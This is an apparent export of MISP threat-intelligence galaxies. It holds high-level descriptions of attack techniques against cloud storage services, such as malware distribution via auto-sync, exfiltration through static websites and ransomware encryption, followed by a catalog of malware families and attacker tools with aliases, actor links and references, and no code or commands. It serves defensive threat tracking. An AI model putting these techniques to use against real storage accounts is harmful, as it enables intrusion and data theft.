Attackers may use storage services to store a malicious program or toolset that will be executed at later times during their operation. In addition, adversaries may exploit the trust between users and their organization’s Storage services by storing phishing content. Furthermore, storage services can be leveraged to park gathered intelligence that will be exfiltrated when terms suit the actor group.

The tag is: misp-galaxy:tmss="MS-T821 - Malicious content upload"

Table 16273. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/malicious-content-upload

MS-T822 - Malware distribution

Storage services offer different types of mechanisms to support auto-synchronization between various resources and the storage account. Attackers may leverage access to the storage account to upload malware and benefit from the auto-sync built-in capabilities to have their payload being populated and potentially weaponize multiple systems.

The tag is: misp-galaxy:tmss="MS-T822 - Malware distribution"

Table 16274. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/malware-distribution

MS-T823 - Trigger cross-service interaction

Attackers may manipulate storage services to trigger a compute service, like Azure Functions, where an attacker already has a foothold on a storage container and can inject a blob that will initiate a chain of a compute process. This may allow an attacker to infiltrate another resource and cause harm.

The tag is: misp-galaxy:tmss="MS-T823 - Trigger cross-service interaction"

Table 16275. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/trigger-cross-service-interaction

MS-T824 - Code injection

Same is applicable for data blobs or files which may be eventually processed on a host by a legitimate application with software vulnerabilities. Attackers may tamper benign data with a payload that exploits a vulnerability on a user’s end and execute a malicious code.

The tag is: misp-galaxy:tmss="MS-T824 - Code injection"

Table 16276. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/code-injection

MS-T836 - Static website

Attackers may use the "static website" feature to exfiltrate collected data outside of the storage account. Static website is a cloud storage provider hosting capability that enables serving static web content directly from the storage account. The website can be reached via an alternative web endpoint which might be overlooked when restricting access to the storage account.

The tag is: misp-galaxy:tmss="MS-T836 - Static website"

Table 16277. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/static-website

MS-T839 - Data corruption

Attackers may corrupt or delete data stored on storage services to disrupt the availability of systems or other lines of business.

The tag is: misp-galaxy:tmss="MS-T839 - Data corruption"

Table 16278. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/data-corruption

MS-T838 - Data encryption for impact (Ransomware)

Attackers may encrypt data stored on storage services to disrupt the availability of systems or other lines of business. Making resources inaccessible by encrypting files or blobs and withholding access to a decryption key. This may be done to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware).

The tag is: misp-galaxy:tmss="MS-T838 - Data encryption for impact (Ransomware)"

Table 16279. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/data-encryption-for-impact

MS-T837 - Data manipulation

Attackers may insert or modify data in order to influence external outcomes, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary.

The tag is: misp-galaxy:tmss="MS-T837 - Data manipulation"

Table 16280. Table References

Links

https://microsoft.github.io/Threat-matrix-for-storage-services/techniques/data-manipulation

Tool

threat-actor-tools is an enumeration of tools used by adversaries. The list includes malware but also common software regularly used by the adversaries..

Tool is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Alexandre Dulaunoy - Florian Roth - Timo Steffens - Christophe Vandeplas - Dennis Rand - raw-data

Tinba

Banking Malware

The tag is: misp-galaxy:tool="Tinba"

Tinba is also known as:

  • Hunter

  • Zusy

  • TinyBanker

Tinba has relationships with:

  • similar: misp-galaxy:exploit-kit="Hunter" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:banker="Tinba" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Tinba" with estimative-language:likelihood-probability="likely"

Table 16281. Table References

Links

https://thehackernews.com/search/label/Zusy%20Malware

http://blog.trendmicro.com/trendlabs-security-intelligence/the-tinbatinybanker-malware/

PlugX

Malware

The tag is: misp-galaxy:tool="PlugX"

PlugX is also known as:

  • Backdoor.FSZO-5117

  • Trojan.Heur.JP.juW@ayZZvMb

  • Trojan.Inject1.6386

  • Korplug

  • Agent.dhwf

PlugX has relationships with:

  • similar: misp-galaxy:rat="PlugX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="PlugX" with estimative-language:likelihood-probability="likely"

Table 16282. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/112/pulling-the-plug-on-plugx

MSUpdater

Trojan (RAT) linked to current targeted attacks and others dating back to at least early 2009

The tag is: misp-galaxy:tool="MSUpdater"

Table 16283. Table References

Links

https://www.zscaler.com/pdf/whitepapers/msupdater_trojan_whitepaper.pdfx

Lazagne

A password sthealing tool regularly used by attackers

The tag is: misp-galaxy:tool="Lazagne"

Lazagne has relationships with:

  • similar: misp-galaxy:malpedia="LaZagne" with estimative-language:likelihood-probability="almost-certain"

Table 16284. Table References

Links

https://github.com/AlessandroZ/LaZagne

Poison Ivy

Poison Ivy is a RAT which was freely available and first released in 2005.

The tag is: misp-galaxy:tool="Poison Ivy"

Poison Ivy is also known as:

  • Backdoor.Win32.PoisonIvy

  • Gen:Trojan.Heur.PT

Poison Ivy has relationships with:

  • used-by: misp-galaxy:threat-actor="APT14" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="PoisonIvy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="poisonivy" with estimative-language:likelihood-probability="likely"

Table 16285. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf

https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml

SPIVY

In March 2016, Unit 42 observed this new Poison Ivy variant we’ve named SPIVY being deployed via weaponized documents leveraging CVE-2015-2545.

The tag is: misp-galaxy:tool="SPIVY"

Table 16286. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/

Torn RAT

The tag is: misp-galaxy:tool="Torn RAT"

Torn RAT is also known as:

  • Anchor Panda

Torn RAT has relationships with:

  • used-by: misp-galaxy:threat-actor="APT14" with estimative-language:likelihood-probability="likely"

Table 16287. Table References

Links

https://www.crowdstrike.com/blog/whois-anchor-panda/

OzoneRAT

The tag is: misp-galaxy:tool="OzoneRAT"

OzoneRAT is also known as:

  • Ozone RAT

  • ozonercp

Table 16288. Table References

Links

https://blog.fortinet.com/2016/08/29/german-speakers-targeted-by-spam-leading-to-ozone-rat

ZeGhost

ZeGhots is a RAT which was freely available and first released in 2014.

The tag is: misp-galaxy:tool="ZeGhost"

ZeGhost is also known as:

  • BackDoor-FBZT!52D84425CDF2

  • Trojan.Win32.Staser.ytq

  • Win32/Zegost.BW

Table 16289. Table References

Links

https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor%3aWin32%2fZegost.BW

Elise Backdoor

Trojan (RAT) linked to current targeted attacks and others dating back to at least early 2009

The tag is: misp-galaxy:tool="Elise Backdoor"

Elise Backdoor is also known as:

  • Elise

Elise Backdoor has relationships with:

  • similar: misp-galaxy:mitre-malware="Elise - S0081" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Elise" with estimative-language:likelihood-probability="likely"

Table 16290. Table References

Links

http://thehackernews.com/2015/08/elise-malware-hacking.html

Trojan.Laziok

A new information stealer, Trojan.Laziok, acts as a reconnaissance tool allowing attackers to gather information and tailor their attack methods for each compromised computer.

The tag is: misp-galaxy:tool="Trojan.Laziok"

Trojan.Laziok is also known as:

  • Laziok

Trojan.Laziok has relationships with:

  • similar: misp-galaxy:malpedia="Laziok" with estimative-language:likelihood-probability="likely"

Table 16291. Table References

Links

http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector

Slempo

Android-based malware

The tag is: misp-galaxy:tool="Slempo"

Slempo is also known as:

  • GM-Bot

  • SlemBunk

  • Bankosy

  • Acecard

Slempo has relationships with:

  • similar: misp-galaxy:android="GM Bot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Bankosy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Slempo" with estimative-language:likelihood-probability="likely"

Table 16292. Table References

Links

https://securityintelligence.com/android-malware-about-to-get-worse-gm-bot-source-code-leaked/

PWOBot

We have discovered a malware family named ‘PWOBot’ that is fairly unique because it is written entirely in Python, and compiled via PyInstaller to generate a Microsoft Windows executable. The malware has been witnessed affecting a number of Europe-based organizations, particularly in Poland. Additionally, the malware is delivered via a popular Polish file-sharing web service.

The tag is: misp-galaxy:tool="PWOBot"

PWOBot is also known as:

  • PWOLauncher

  • PWOHTTPD

  • PWOKeyLogger

  • PWOMiner

  • PWOPyExec

  • PWOQuery

Table 16293. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/04/unit42-python-based-pwobot-targets-european-organizations/

Lost Door RAT

We recently came across a cyber attack that used a remote access Trojan (RAT) called Lost Door, a tool currently offered on social media sites. What also struck us the most about this RAT (detected as BKDR_LODORAT.A) is how it abuses the Port Forward feature in routers.

The tag is: misp-galaxy:tool="Lost Door RAT"

Lost Door RAT is also known as:

  • LostDoor RAT

  • BKDR_LODORAT

Table 16294. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/lost-door-rat-accessible-customizable-attack-tool/

njRAT

The tag is: misp-galaxy:tool="njRAT"

njRAT is also known as:

  • Bladabindi

  • Jorik

njRAT has relationships with:

  • similar: misp-galaxy:malpedia="NjRAT" with estimative-language:likelihood-probability="likely"

Table 16295. Table References

Links

http://www.fidelissecurity.com/files/files/FTA_1009-njRAT_Uncovered_rev2.pdf

https://github.com/kevthehermit/RATDecoders/blob/master/yaraRules/njRat.yar

NanoCoreRAT

The tag is: misp-galaxy:tool="NanoCoreRAT"

NanoCoreRAT is also known as:

  • NanoCore

  • Nancrat

  • Zurten

  • Atros2.CKPN

NanoCoreRAT has relationships with:

  • similar: misp-galaxy:rat="NanoCore" with estimative-language:likelihood-probability="likely"

Table 16296. Table References

Links

http://www.symantec.com/connect/blogs/nanocore-another-rat-tries-make-it-out-gutter

https://nanocore.io/

Sakula

The tag is: misp-galaxy:tool="Sakula"

Sakula is also known as:

  • Sakurel

Sakula has relationships with:

  • similar: misp-galaxy:rat="Sakula" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Sakula - S0074" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Sakula RAT" with estimative-language:likelihood-probability="likely"

Table 16297. Table References

Links

https://www.secureworks.com/research/sakula-malware-family

Hi-ZOR

The tag is: misp-galaxy:tool="Hi-ZOR"

Table 16298. Table References

Links

http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html

Derusbi

The tag is: misp-galaxy:tool="Derusbi"

Derusbi is also known as:

  • TROJ_DLLSERV.BE

Derusbi has relationships with:

  • similar: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Derusbi (Windows)" with estimative-language:likelihood-probability="likely"

Table 16299. Table References

Links

http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf

https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf

EvilGrab

The tag is: misp-galaxy:tool="EvilGrab"

EvilGrab is also known as:

  • BKDR_HGDER

  • BKDR_EVILOGE

  • BKDR_NVICM

  • Wmonder

EvilGrab has relationships with:

  • similar: misp-galaxy:mitre-malware="EvilGrab - S0152" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="EvilGrab" with estimative-language:likelihood-probability="likely"

Table 16300. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/evilgrab-malware-family-used-in-targeted-attacks-in-asia/

http://researchcenter.paloaltonetworks.com/2015/06/evilgrab-delivered-by-watering-hole-attack-on-president-of-myanmars-website/

Trojan.Naid

The tag is: misp-galaxy:tool="Trojan.Naid"

Trojan.Naid is also known as:

  • Naid

  • Mdmbot.E

  • AGENT.GUNZ

  • AGENT.AQUP.DROPPER

  • AGENT.BMZA

  • MCRAT.A

  • AGENT.ABQMR

Trojan.Naid has relationships with:

  • similar: misp-galaxy:mitre-malware="Naid - S0205" with estimative-language:likelihood-probability="likely"

Table 16301. Table References

Links

https://www.symantec.com/connect/blogs/cve-2012-1875-exploited-wild-part-1-trojannaid

http://telussecuritylabs.com/threats/show/TSL20120614-05

Moudoor

Backdoor.Moudoor, a customized version of Gh0st RAT

The tag is: misp-galaxy:tool="Moudoor"

Moudoor is also known as:

  • SCAR

  • KillProc.14145

Table 16302. Table References

Links

http://www.darkreading.com/attacks-breaches/elite-chinese-cyberspy-group-behind-bit9-hack/d/d-id/1140495

https://securityledger.com/2013/09/apt-for-hire-symantec-outs-hidden-lynx-hacking-crew/

NetTraveler

APT that infected hundreds of high profile victims in more than 40 countries. Known targets of NetTraveler include Tibetan/Uyghur activists, oil industry companies, scientific research centers and institutes, universities, private companies, governments and governmental institutions, embassies and military contractors.

The tag is: misp-galaxy:tool="NetTraveler"

NetTraveler is also known as:

  • TravNet

  • Netfile

NetTraveler has relationships with:

  • similar: misp-galaxy:mitre-malware="NetTraveler - S0033" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="NetTraveler" with estimative-language:likelihood-probability="likely"

Table 16303. Table References

Links

https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/

Winnti

APT used As part of Operation SMN, Novetta analyzed recent versions of the Winnti malware. The samples, compiled from mid- to late 2014, exhibited minimal functional changes over the previous generations Kaspersky reported in 2013.

The tag is: misp-galaxy:tool="Winnti"

Winnti is also known as:

  • Etso

  • SUQ

  • Agent.ALQHI

  • RbDoor

  • RibDoor

  • HIGHNOON

Winnti has relationships with:

  • similar: misp-galaxy:mitre-malware="Winnti for Windows - S0141" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Winnti (Windows)" with estimative-language:likelihood-probability="likely"

Table 16304. Table References

Links

https://securelist.com/blog/incidents/57455/nettraveler-is-back-the-red-star-apt-returns-with-new-tricks/

https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf

Mimikatz

Ease Credential stealh and replay, A little tool to play with Windows security.

The tag is: misp-galaxy:tool="Mimikatz"

Mimikatz is also known as:

  • Mikatz

Mimikatz has relationships with:

  • similar: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="MimiKatz" with estimative-language:likelihood-probability="almost-certain"

Table 16305. Table References

Links

https://github.com/gentilkiwi/mimikatz

https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

WEBC2

Backdoor attribued to APT1

The tag is: misp-galaxy:tool="WEBC2"

WEBC2 has relationships with:

  • similar: misp-galaxy:mitre-malware="WEBC2 - S0109" with estimative-language:likelihood-probability="likely"

Table 16306. Table References

Links

https://github.com/gnaegle/cse4990-practical3

https://www.securestate.com/blog/2013/02/20/apt-if-it-aint-broke

Pirpi

Symantec has observed Buckeye activity dating back to 2009, involving attacks on various organizations in several regions. Buckeye used a remote access Trojan (Backdoor.Pirpi) in attacks against a US organization’s network in 2009. The group delivered Backdoor.Pirpi through malicious attachments or links in convincing spear-phishing emails.

The tag is: misp-galaxy:tool="Pirpi"

Pirpi is also known as:

  • Badey

  • EXL

Pirpi has relationships with:

  • similar: misp-galaxy:mitre-malware="SHOTPUT - S0063" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="pirpi" with estimative-language:likelihood-probability="almost-certain"

Table 16307. Table References

Links

http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong

RARSTONE

RARSTONE is a Remote Access Tool (RAT) discovered early 2013 by TrendMicro, it’s characterized by a great affinity with the other RAT know as Plug is and was used in April for phishing campaigns that followed the dramatic attack to the Boston Marathon.

The tag is: misp-galaxy:tool="RARSTONE"

RARSTONE has relationships with:

  • similar: misp-galaxy:mitre-malware="RARSTONE - S0055" with estimative-language:likelihood-probability="likely"

Table 16308. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/

Backspace

Backspace is a Backdoor that targets the Windows platform. This malware is reportedly associated with targeted attacks against Association of Southeast Asian Nations (ASEAN) members (APT30).

The tag is: misp-galaxy:tool="Backspace"

Backspace is also known as:

  • Lecna

Backspace has relationships with:

  • similar: misp-galaxy:mitre-malware="BACKSPACE - S0031" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="backspace" with estimative-language:likelihood-probability="almost-certain"

Table 16309. Table References

Links

https://www2.fireeye.com/WEB-2015RPTAPT30.html

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf

XSControl

Backdoor user by he Naikon APT group

The tag is: misp-galaxy:tool="XSControl"

Table 16310. Table References

Links

https://securelist.com/analysis/publications/69953/the-naikon-apt/

https://kasperskycontenthub.com/securelist/files/2015/05/TheNaikonAPT-MsnMM.pdf

Neteagle

NETEAGLE is a backdoor developed by APT30 with compile dates as early as 2008. It has two main variants known as Scout and Norton.

The tag is: misp-galaxy:tool="Neteagle"

Neteagle is also known as:

  • scout

  • norton

Neteagle has relationships with:

  • similar: misp-galaxy:malpedia="NETEAGLE" with estimative-language:likelihood-probability="almost-certain"

Table 16311. Table References

Links

https://attack.mitre.org/wiki/Software/S0034

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Agent.BTZ

In November 2014, the experts of the G DATA SecurityLabs published an article about ComRAT, the Agent.BTZ successor. We explained that this case is linked to the Uroburos rootkit.

The tag is: misp-galaxy:tool="Agent.BTZ"

Agent.BTZ is also known as:

  • ComRat

Agent.BTZ has relationships with:

  • similar: misp-galaxy:rat="ComRAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="ComRAT - S0126" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Agent.BTZ" with estimative-language:likelihood-probability="likely"

Table 16312. Table References

Links

https://blog.gdatasoftware.com/2015/01/23927-evolution-of-sophisticated-spyware-from-agent-btz-to-comrat

Heseber BOT

RAT bundle with standard VNC (to avoid/limit A/V detection).

The tag is: misp-galaxy:tool="Heseber BOT"

Agent.dne

The tag is: misp-galaxy:tool="Agent.dne"

Wipbot

Waterbug is the name given to the actors who use the malware tools Trojan.Wipbot (also known as Tavdig and Epic Turla)

The tag is: misp-galaxy:tool="Wipbot"

Wipbot is also known as:

  • Tavdig

  • Epic Turla

  • WorldCupSec

  • TadjMakhal

Wipbot has relationships with:

  • similar: misp-galaxy:mitre-malware="Epic - S0091" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Wipbot" with estimative-language:likelihood-probability="likely"

Table 16313. Table References

Links

https://securelist.com/analysis/publications/65545/the-epic-turla-operation/

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf

Turla

Family of related sophisticated backdoor software - Name comes from Microsoft detection signature – anagram of Ultra (Ultra3) was a name of the fake driver). A macOS version exists but appears incomplete and lacking features…​for now!

The tag is: misp-galaxy:tool="Turla"

Turla is also known as:

  • Snake

  • Uroburos

  • Urouros

Turla has relationships with:

  • similar: misp-galaxy:mitre-malware="Uroburos - S0022" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Uroburos (Windows)" with estimative-language:likelihood-probability="likely"

Table 16314. Table References

Links

https://www.first.org/resources/papers/tbilisi2014/turla-operations_and_development.pdf

https://objective-see.com/blog/blog_0x25.html#Snake

Winexe

The tag is: misp-galaxy:tool="Winexe"

Winexe has relationships with:

  • similar: misp-galaxy:mitre-tool="Winexe - S0191" with estimative-language:likelihood-probability="likely"

Dark Comet

RAT initialy identified in 2011 and still actively used.

The tag is: misp-galaxy:tool="Dark Comet"

Dark Comet has relationships with:

  • similar: misp-galaxy:rat="DarkComet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="DarkComet" with estimative-language:likelihood-probability="likely"

Cadelspy

The tag is: misp-galaxy:tool="Cadelspy"

Cadelspy is also known as:

  • WinSpy

Cadelspy has relationships with:

  • similar: misp-galaxy:malpedia="CadelSpy" with estimative-language:likelihood-probability="almost-certain"

CMStar

The tag is: misp-galaxy:tool="CMStar"

CMStar has relationships with:

  • similar: misp-galaxy:malpedia="CMSTAR" with estimative-language:likelihood-probability="almost-certain"

Table 16315. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/

DHS2015

The tag is: misp-galaxy:tool="DHS2015"

DHS2015 is also known as:

  • iRAT

Table 16316. Table References

Links

https://securelist.com/files/2015/02/The-Desert-Falcons-targeted-attacks.pdf

Gh0st Rat

Gh0st Rat is a well-known Chinese remote access trojan which was originally made by C.Rufus Security Team several years ago. GH0ST is a backdoor written in C++ that communicates via a custom binary protocol over TCP or UDP. It typically features a packet signature at the start of each message that varies between samples. Availability: Public

The tag is: misp-galaxy:tool="Gh0st Rat"

Gh0st Rat is also known as:

  • Gh0stRat, GhostRat

Gh0st Rat has relationships with:

  • used-by: misp-galaxy:threat-actor="APT14" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16317. Table References

Links

http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

Fakem RAT

Fakem RAT makes their network traffic look like well-known protocols (e.g. Messenger traffic, HTML pages).

The tag is: misp-galaxy:tool="Fakem RAT"

Fakem RAT is also known as:

  • FAKEM

Fakem RAT has relationships with:

  • similar: misp-galaxy:malpedia="Terminator RAT" with estimative-language:likelihood-probability="likely"

Table 16318. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-fakem-rat.pdf

MFC Huner

The tag is: misp-galaxy:tool="MFC Huner"

MFC Huner is also known as:

  • Hupigon

  • BKDR_HUPIGON

Table 16319. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/japan-us-defense-industries-among-targeted-entities-in-latest-attack/

Blackshades

Blackshades Remote Access Tool targets Microsoft Windows operating systems. Authors were arrested in 2012 and 2014.

The tag is: misp-galaxy:tool="Blackshades"

Blackshades has relationships with:

  • similar: misp-galaxy:rat="Blackshades" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BlackShades" with estimative-language:likelihood-probability="almost-certain"

Table 16320. Table References

Links

https://www.justice.gov/usao-sdny/pr/manhattan-us-attorney-and-fbi-assistant-director-charge-announce-charges-connection

https://blog.malwarebytes.org/intelligence/2012/06/you-dirty-rat-part-2-blackshades-net/

CHOPSTICK

backdoor used by apt28

The tag is: misp-galaxy:tool="CHOPSTICK"

CHOPSTICK is also known as:

  • webhp

  • SPLM

  • (.v2 fysbis)

CHOPSTICK has relationships with:

  • similar: misp-galaxy:mitre-malware="CHOPSTICK - S0023" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="X-Agent for Android - S0314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="X-Agent" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"

Table 16321. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

EVILTOSS

backdoor used by apt28

Sedreco serves as a spying backdoor; its functionalities can be extended with dynamically loaded plugins. It is made up of two distinct components: a dropper and the persistent payload installed by this dropper. We have not seen this component since April 2016.

The tag is: misp-galaxy:tool="EVILTOSS"

EVILTOSS is also known as:

  • Sedreco

  • AZZY

  • ADVSTORESHELL

  • NETUI

EVILTOSS has relationships with:

  • similar: misp-galaxy:mitre-malware="ADVSTORESHELL - S0045" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Sedreco" with estimative-language:likelihood-probability="likely"

Table 16322. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

GAMEFISH

backdoor

The tag is: misp-galaxy:tool="GAMEFISH"

GAMEFISH is also known as:

  • Sednit

  • Seduploader

  • JHUHUGIT

  • Sofacy

GAMEFISH has relationships with:

  • similar: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sofacy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

Table 16323. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

SOURFACE

downloader - Older version of CORESHELL

The tag is: misp-galaxy:tool="SOURFACE"

SOURFACE is also known as:

  • Sofacy

SOURFACE has relationships with:

  • similar: misp-galaxy:mitre-malware="CORESHELL - S0137" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sofacy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

Table 16324. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

OLDBAIT

credential harvester

The tag is: misp-galaxy:tool="OLDBAIT"

OLDBAIT is also known as:

  • Sasfis

  • BackDoor-FDU

  • IEChecker

OLDBAIT has relationships with:

  • similar: misp-galaxy:mitre-malware="OLDBAIT - S0138" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="OLDBAIT" with estimative-language:likelihood-probability="almost-certain"

Table 16325. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_sasfis.tl

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

CORESHELL

downloader - Newer version of SOURFACE

The tag is: misp-galaxy:tool="CORESHELL"

CORESHELL is also known as:

  • Sofacy

CORESHELL has relationships with:

  • similar: misp-galaxy:mitre-malware="CORESHELL - S0137" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sofacy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Coreshell" with estimative-language:likelihood-probability="almost-certain"

Table 16326. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

Havex RAT

The tag is: misp-galaxy:tool="Havex RAT"

Havex RAT is also known as:

  • Havex

Havex RAT has relationships with:

  • similar: misp-galaxy:mitre-malware="Backdoor.Oldrea - S0093" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Havex RAT" with estimative-language:likelihood-probability="likely"

KjW0rm

RAT initially written in VB.

The tag is: misp-galaxy:tool="KjW0rm"

KjW0rm has relationships with:

  • similar: misp-galaxy:rat="KjW0rm" with estimative-language:likelihood-probability="likely"

Table 16327. Table References

Links

https://www.sentinelone.com/blog/understanding-kjw0rm-malware-we-dive-in-to-the-tv5-cyber-attack/

TinyTyphon

The tag is: misp-galaxy:tool="TinyTyphon"

TinyTyphon has relationships with:

  • similar: misp-galaxy:malpedia="TinyTyphon" with estimative-language:likelihood-probability="likely"

Badnews

The tag is: misp-galaxy:tool="Badnews"

Badnews has relationships with:

  • similar: misp-galaxy:malpedia="BadNews" with estimative-language:likelihood-probability="almost-certain"

LURK

The tag is: misp-galaxy:tool="LURK"

LURK has relationships with:

  • similar: misp-galaxy:malpedia="Lurk" with estimative-language:likelihood-probability="almost-certain"

Oldrea

The tag is: misp-galaxy:tool="Oldrea"

AmmyAdmin

The tag is: misp-galaxy:tool="AmmyAdmin"

Matryoshka

The tag is: misp-galaxy:tool="Matryoshka"

Matryoshka has relationships with:

  • similar: misp-galaxy:rat="Matryoshka" with estimative-language:likelihood-probability="likely"

TinyZBot

The tag is: misp-galaxy:tool="TinyZBot"

